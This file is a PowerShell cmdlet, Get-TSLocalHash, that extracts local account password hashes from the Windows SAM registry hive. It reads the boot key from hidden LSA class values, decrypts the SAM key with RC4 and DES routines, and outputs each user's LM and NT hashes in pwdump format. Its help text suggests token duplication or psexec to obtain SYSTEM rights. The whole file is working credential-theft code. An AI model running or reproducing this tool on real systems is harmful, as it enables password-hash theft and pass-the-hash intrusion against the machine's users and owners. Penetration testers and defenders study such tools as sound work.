Get-TSLocalHash.ps1

1. function Get-TSLocalHash {
2. <#
3.   .SYNOPSIS
4.   Extracts hashes from SAM
5.  
6.   .DESCRIPTION
7.   The Get-TSHash CmdLet extracts the hashes from SAM. The CmdLet
8.   Requires an elevated prompt and local system permissions. You can use Enable-TSDuplicateToken or psexec to retrieve system permissions.
9.  
10.   .EXAMPLE
11.   Enable-TSDuplicateToken
12.  
13.   Get-TSHash
14. #>
15.  
16. [CmdletBinding()]
17. param()
18.  
19. $signature = @"
20. [DllImport("advapi32.dll", CharSet = CharSet.Auto)]
21. public static extern int RegOpenKeyEx(
22.    int hKey,
23.    string subKey,
24.    int ulOptions,
25.    int samDesired,
26.    out int hkResult);
27.  
28. [DllImport("advapi32.dll", EntryPoint = "RegEnumKeyEx")]
29. extern public static int RegEnumKeyEx(
30.    int hkey,
31.    int index,
32.    StringBuilder lpName,
33.    ref int lpcbName,
34.    int reserved,
35.    StringBuilder lpClass,
36.    ref int lpcbClass,
37.    out long lpftLastWriteTime);
38.  
39. [DllImport("advapi32.dll", EntryPoint="RegQueryInfoKey", CallingConvention=CallingConvention.Winapi, SetLastError=true)]
40. extern public static int RegQueryInfoKey(
41.    int hkey,
42.    StringBuilder lpClass,
43.    ref int lpcbClass,
44.    int lpReserved,
45.    out int lpcSubKeys,
46.    out int lpcbMaxSubKeyLen,
47.    out int lpcbMaxClassLen,
48.    out int lpcValues,
49.    out int lpcbMaxValueNameLen,
50.    out int lpcbMaxValueLen,
51.    out int lpcbSecurityDescriptor,
52.    IntPtr lpftLastWriteTime);
53.  
54. [DllImport("advapi32.dll", SetLastError=true)]
55. public static extern int RegCloseKey(
56.    int hKey);
57.  
58. // Shift Class From Huddled Masses
59. public class Shift {
60.    public static int   Right(int x,   int count) { return x >> count; }
61.    public static uint  Right(uint x,  int count) { return x >> count; }
62.    public static long  Right(long x,  int count) { return x >> count; }
63.    public static ulong Right(ulong x, int count) { return x >> count; }
64.    public static int    Left(int x,   int count) { return x << count; }
65.    public static uint   Left(uint x,  int count) { return x << count; }
66.    public static long   Left(long x,  int count) { return x << count; }
67.    public static ulong  Left(ulong x, int count) { return x << count; }
68. }
69. "@
70.  
71.   # Add Type
72.   Add-Type -MemberDefinition $signature -Name HashDump -Namespace TrueSec -UsingNamespace System.Text
73.  
74.   # Add Script constants, as described here
75.   # http://code.google.com/p/volatility/source/browse/trunk/volatility/?r=1587#volatility%2Fwin32
76.  
77.   # Odd Parity
78.   $odd_parity = @(
79.     1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14,
80.     16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31,
81.     32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47,
82.     49, 49, 50, 50, 52, 52, 55, 55, 56, 56, 59, 59, 61, 61, 62, 62,
83.     64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79,
84.     81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91, 91, 93, 93, 94, 94,
85.     97, 97, 98, 98,100,100,103,103,104,104,107,107,109,109,110,110,
86.     112,112,115,115,117,117,118,118,121,121,122,122,124,124,127,127,
87.     128,128,131,131,133,133,134,134,137,137,138,138,140,140,143,143,
88.     145,145,146,146,148,148,151,151,152,152,155,155,157,157,158,158,
89.     161,161,162,162,164,164,167,167,168,168,171,171,173,173,174,174,
90.     176,176,179,179,181,181,182,182,185,185,186,186,188,188,191,191,
91.     193,193,194,194,196,196,199,199,200,200,203,203,205,205,206,206,
92.     208,208,211,211,213,213,214,214,217,217,218,218,220,220,223,223,
93.     224,224,227,227,229,229,230,230,233,233,234,234,236,236,239,239,
94.     241,241,242,242,244,244,247,247,248,248,251,251,253,253,254,254
95.   );
96.  
97.   # Constants for SAM decrypt algorithm
98.   $aqwerty = [Text.Encoding]::ASCII.GetBytes("!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%`0")
99.   $anum = [Text.Encoding]::ASCII.GetBytes("0123456789012345678901234567890123456789`0")
100.   $antpassword = [Text.Encoding]::ASCII.GetBytes("NTPASSWORD`0")
101.   $almpassword = [Text.Encoding]::ASCII.GetBytes("LMPASSWORD`0")
102.   $lmKey = [Text.Encoding]::ASCII.GetBytes("KGS!@#$%`0")
103.  
104.   $empty_lm = [byte[]]@(0xaa,0xd3,0xb4,0x35,0xb5,0x14,0x04,0xee,0xaa,0xd3,0xb4,0x35,0xb5,0x14,0x04,0xee);
105.   $empty_nt = [byte[]]@(0x31,0xd6,0xcf,0xe0,0xd1,0x6a,0xe9,0x31,0xb7,0x3c,0x59,0xd7,0xe0,0xc0,0x89,0xc0);
106.  
107.   # Permutation matrix for boot key
108.   $permutationMatrix = 0x8, 0x5, 0x4, 0x2, 0xb, 0x9, 0xd, 0x3, 0x0, 0x6, 0x1, 0xc, 0xe, 0xa, 0xf, 0x7
109.  
110.   #=======================================
111.   # BootKey
112.   #=======================================
113.  
114.   # Enumerate Keys and return hidden value
115.   $values = "JD","Skew1","GBG","Data" | ForEach-Object {
116.     $baseKey = 0x80000002
117.     $subKey = "SYSTEM\CurrentControlSet\Control\Lsa\$_"
118.     [int]$hKey = 0
119.     # Open Reg Key using RegOpenKeyEx Method
120.     [void][TrueSec.HashDump]::RegOpenKeyEx($baseKey, $subKey, 0, 0x19, [ref]$hkey)
121.  
122.     # Read Reg Key Data using RegQueryInfoKey Method
123.     $lpClass = New-Object Text.Stringbuilder 1024
124.     [int]$length = 1024
125.     [void][TrueSec.HashDump]::RegQueryInfoKey($hkey, $lpClass,[ref]$length,0, [ref]$null, [ref]$null, [ref]$null, [ref]$null, [ref]$null, [ref]$null, [ref]$null, 0)
126.     $lpClass.ToString()
127.  
128.     # Close Reg Key using RegCloseKey Method
129.     [void][TrueSec.HashDump]::RegCloseKey($hKey)
130.   }
131.  
132.   # Convert Array to String
133.   $valueString = [string]::Join("",$values)
134.  
135.   # Scramble Values
136.   $byte = new-object byte[] $($valueString.Length/2)
137.   0..$($byte.Length-1) | ForEach-Object {
138.     $byte[$_] = [Convert]::ToByte($valueString.Substring($($_*2),2),16)
139.   }
140.  
141.   $scrambledBootKey = new-object byte[] 16;
142.  
143.   $permutationMatrix | ForEach-Object -begin {$i=0} -Process { $scrambledBootKey[$i] = $byte[$_];$i++}
144.  
145.   #=======================================
146.   # HbootKey
147.   #=======================================
148.  
149.   # Get byte array Value from registry
150.   $f = Get-ItemProperty -Path HKLM:\SAM\SAM\Domains\Account | Select-Object -ExpandProperty F
151.  
152.   # Create RC4 Key
153.   $rc4key = [Security.Cryptography.MD5]::Create().ComputeHash($f[0x70..0x7F] + $aqwerty + $scrambledBootKey + $anum);
154.   $s = 0..255
155.  
156.   0..255 | ForEach-Object -Begin { [long]$j = 0 } -Process {
157.     $j = ($j + $rc4key[ $($_ % $rc4key.Length) ] + $s[$_]) % $s.Length
158.     $tmp = $s[$_]
159.     $s[$_] = $s[$j]
160.     $s[$j] = $tmp
161.   }
162.  
163.   $data = $F[0x80..0x9F]
164.   $hBootKey = New-Object byte[] $data.Length
165.   $s2 = $s[0..$($s.Length)];
166.  
167.   0..$($data.Length-1) | ForEach-Object -begin {$i=0;$j=0;} -Process {
168.     $i = ($i+1) % $S2.Length;
169.     $j = ($j + $S2[$i]) % $S2.Length;
170.     $tmp = $S2[$i];$S2[$i] = $S2[$j];$S2[$j] = $tmp;
171.     $a = $data[$_];
172.     $b = $S2[ $($S2[$i]+$S2[$j]) % $S2.Length ];
173.     $hBootKey[$_] = ($a -bxor $b);
174.   }
175.  
176.   #=============================================
177.   # Get User Keys
178.   #=============================================
179.  
180.   $users = Get-ChildItem HKLM:\SAM\SAM\Domains\Account\Users | Where-Object { $_.PSCHildName -match "^[0-9A-Fa-f]{8}$" } | ForEach-Object {
181.     New-Object PSObject -Property @{
182.       UserName = $(
183.         [Text.Encoding]::Unicode.GetString(
184.           $($_.GetValue("V")),
185.            [BitConverter]::ToInt32($_.GetValue("V")[0x0c..0x0f],0) + 0xCC, [BitConverter]::ToInt32($_.GetValue("V")[0x10..0x13],0)
186.         );
187.       );
188.       Rid = $(
189.         [Convert]::ToInt32($_.PSChildName, 16)
190.       );
191.       V = $( [byte[]]($_.GetValue("V")) );
192.       HashOffset = $( [BitConverter]::ToUInt32($_.GetValue("V")[0x9c..0x9f],0) + 0xCC )
193.     }
194.   }
195.  
196.   #==============================================
197.   # Get User Hashes
198.   #==============================================
199.  
200.   foreach($user in $users) {
201.     # Set encypted nt & lm hash to null
202.     [byte[]]$enc_lm_hash = $null
203.     [byte[]]$enc_nt_hash = $null
204.  
205.     if($user.HashOffset + 0x28 -lt $user.V.Length) {
206.       $lm_hash_offset = $user.HashOffset + 4
207.       $nt_hash_offset = $user.HashOffset + 8 + 0x10
208.  
209.       $enc_lm_hash = $user.V[$($lm_hash_offset)..$($lm_hash_offset + 0x0f)]
210.       $enc_nt_hash = $user.V[$($nt_hash_offset)..$($nt_hash_offset + 0x0f)]
211.  
212.     } elseif($user.HashOffset + 0x14 -lt $user.V.Length) {
213.       $nt_hash_offset = $user.HashOffset + 8
214.       $enc_nt_hash = [byte[]]$user.V[$($nt_hash_offset)..$($nt_hash_offset+0x0f)]
215.     }
216.     # User Sid To Key
217.     $s1 = @();
218.     $s1 += [char]($user.Rid -band 0xFF);
219.     $s1 += [char]([TrueSec.HashDump+Shift]::Right($user.Rid,8) -band 0xFF);
220.     $s1 += [char]([TrueSec.HashDump+Shift]::Right($user.Rid,16) -band 0xFF);
221.     $s1 += [char]([TrueSec.HashDump+Shift]::Right($user.Rid,24) -band 0xFF);
222.     $s1 += $s1[0];
223.     $s1 += $s1[1];
224.     $s1 += $s1[2];
225.     $s2 = @();
226.     $s2 += $s1[3]; $s2 += $s1[0]; $s2 += $s1[1]; $s2 += $s1[2];
227.     $s2 += $s2[0]; $s2 += $s2[1]; $s2 += $s2[2];
228.  
229.     # String to Key
230.     $keys = @()
231.     $keys = $s1, $s2 | ForEach-Object {
232.       $key = @();
233.       $key += [TrueSec.HashDump+Shift]::Right([int]($_[0]), 1 );
234.       $key += [TrueSec.HashDump+Shift]::Left( $([int]($_[0]) -band 0x01), 6) -bor [TrueSec.HashDump+Shift]::Right([int]($_[1]),2);
235.       $key += [TrueSec.HashDump+Shift]::Left( $([int]($_[1]) -band 0x03), 5) -bor [TrueSec.HashDump+Shift]::Right([int]($_[2]),3);
236.       $key += [TrueSec.HashDump+Shift]::Left( $([int]($_[2]) -band 0x07), 4) -bor [TrueSec.HashDump+Shift]::Right([int]($_[3]),4);
237.       $key += [TrueSec.HashDump+Shift]::Left( $([int]($_[3]) -band 0x0F), 3) -bor [TrueSec.HashDump+Shift]::Right([int]($_[4]),5);
238.       $key += [TrueSec.HashDump+Shift]::Left( $([int]($_[4]) -band 0x1F), 2) -bor [TrueSec.HashDump+Shift]::Right([int]($_[5]),6);
239.       $key += [TrueSec.HashDump+Shift]::Left( $([int]($_[5]) -band 0x3F), 1) -bor [TrueSec.HashDump+Shift]::Right([int]($_[6]),7);
240.       $key += $([int]($_[6]) -band 0x7F);
241.       0..7 | %{
242.         $key[$_] = [TrueSec.HashDump+Shift]::Left($key[$_], 1);
243.         $key[$_] = $odd_parity[$key[$_]];
244.       }
245.       , $key
246.     }
247.     #===========================================
248.     # LM Hash
249.     #===========================================
250.     if($enc_lm_hash) {
251.       $md5 = [Security.Cryptography.MD5]::Create();
252.       $rc4key = $md5.ComputeHash($hbootkey[0..0x0f] + [BitConverter]::GetBytes($user.Rid) + $almpassword);
253.  
254.       # RC4
255.       $s = 0..255
256.       0..255 | ForEach-Object -Begin { [long]$j = 0 } -Process {
257.         $j = ($j + $rc4key[ $($_ % $rc4key.Length) ] + $s[$_]) % $s.Length
258.         $tmp = $s[$_]
259.         $s[$_] = $s[$j]
260.         $s[$j] = $tmp
261.       }
262.      
263.       $data = $enc_lm_hash
264.       $obfuscatedKey = New-Object byte[] $data.Length
265.       $s2 = $s[0..$($s.Length)];
266.      
267.       0..$($data.Length-1) | ForEach-Object -begin {$i=0;$j=0;} -Process {
268.         $i = ($i+1) % $S2.Length;
269.         $j = ($j + $S2[$i]) % $S2.Length;
270.         $tmp = $S2[$i];$S2[$i] = $S2[$j];$S2[$j] = $tmp;
271.         $a = $data[$_];
272.         $b = $S2[ $($S2[$i]+$S2[$j]) % $S2.Length ];
273.         $obfuscatedKey[$_] = ($a -bxor $b);
274.       }
275.  
276.       $lmHash = @()
277.       # First Part
278.       $des = new-object Security.Cryptography.DESCryptoServiceProvider
279.       $des.Mode = [Security.Cryptography.CipherMode]::ECB
280.       $des.Padding = [Security.Cryptography.PaddingMode]::None
281.       $des.Key = $keys[0]
282.       $des.IV = $keys[0]
283.       $transform = $des.CreateDecryptor()
284.       $lmHash += $transform.TransformFinalBlock($obfuscatedKey[0..7], 0, $($obfuscatedKey[0..7]).Length);
285.      
286.       # Second Part
287.       $des = new-object Security.Cryptography.DESCryptoServiceProvider
288.       $des.Mode = [Security.Cryptography.CipherMode]::ECB
289.       $des.Padding = [Security.Cryptography.PaddingMode]::None
290.       $des.Key = $keys[1]
291.       $des.IV = $keys[1]
292.       $transform = $des.CreateDecryptor()
293.       $lmHash += $transform.TransformFinalBlock($($obfuscatedKey[8..$($obfuscatedKey.Length -1)]), 0, $($obfuscatedKey[8..$($obfuscatedKey.Length -1)]).Length);
294.     } else {
295.       # Return Empty LM Hash
296.       $lmHash = $empty_lm
297.     }
298.  
299.     #===========================================
300.     # NT Hash
301.     #===========================================
302.     if($enc_nt_hash) {
303.       $md5 = [Security.Cryptography.MD5]::Create();
304.       $rc4key = $md5.ComputeHash($hbootkey[0..0x0f] + [BitConverter]::GetBytes($user.Rid) + $antpassword);
305.  
306.       # RC4
307.       $s = 0..255
308.       0..255 | ForEach-Object -Begin { [long]$j = 0 } -Process {
309.         $j = ($j + $rc4key[ $($_ % $rc4key.Length) ] + $s[$_]) % $s.Length
310.         $tmp = $s[$_]
311.         $s[$_] = $s[$j]
312.         $s[$j] = $tmp
313.       }
314.      
315.       $data = $enc_nt_hash
316.       $obfuscatedKey = New-Object byte[] $data.Length
317.       $s2 = $s[0..$($s.Length)];
318.      
319.       0..$($data.Length-1) | ForEach-Object -begin {$i=0;$j=0;} -Process {
320.         $i = ($i+1) % $S2.Length;
321.         $j = ($j + $S2[$i]) % $S2.Length;
322.         $tmp = $S2[$i];$S2[$i] = $S2[$j];$S2[$j] = $tmp;
323.         $a = $data[$_];
324.         $b = $S2[ $($S2[$i]+$S2[$j]) % $S2.Length ];
325.         $obfuscatedKey[$_] = ($a -bxor $b);
326.       }
327.  
328.       $ntHash = @()
329.       # First Part
330.       $des = new-object Security.Cryptography.DESCryptoServiceProvider
331.       $des.Mode = [Security.Cryptography.CipherMode]::ECB
332.       $des.Padding = [Security.Cryptography.PaddingMode]::None
333.       $des.Key = $keys[0]
334.       $des.IV = $keys[0]
335.       $transform = $des.CreateDecryptor()
336.       $ntHash += $transform.TransformFinalBlock($obfuscatedKey[0..7], 0, $($obfuscatedKey[0..7]).Length);
337.      
338.       # Second Part
339.       $des = new-object Security.Cryptography.DESCryptoServiceProvider
340.       $des.Mode = [Security.Cryptography.CipherMode]::ECB
341.       $des.Padding = [Security.Cryptography.PaddingMode]::None
342.       $des.Key = $keys[1]
343.       $des.IV = $keys[1]
344.       $transform = $des.CreateDecryptor()
345.       $ntHash += $transform.TransformFinalBlock($($obfuscatedKey[8..$($obfuscatedKey.Length -1)]), 0, $($obfuscatedKey[8..$($obfuscatedKey.Length -1)]).Length);
346.     } else {
347.       # Return Empty NT Hash
348.       $ntHash = $empty_nt
349.     }
350.     $user | foreach-object {
351.       New-Object PSObject -Property @{
352.         UserName = $($_.UserName);
353.         Rid = $($_.Rid);
354.         NTHash = $([BitConverter]::ToString($ntHash).Replace("-","").ToLower());
355.         LMHash = $([BitConverter]::ToString($lmHash).Replace("-","").ToLower());
356.         Hash = $("$($_.UserName):$($_.Rid):$([BitConverter]::ToString($lmHash).Replace('-','').ToLower()):$([BitConverter]::ToString($ntHash).Replace('-','').ToLower()):::")
357.       }
358.     }
359.   }
360. }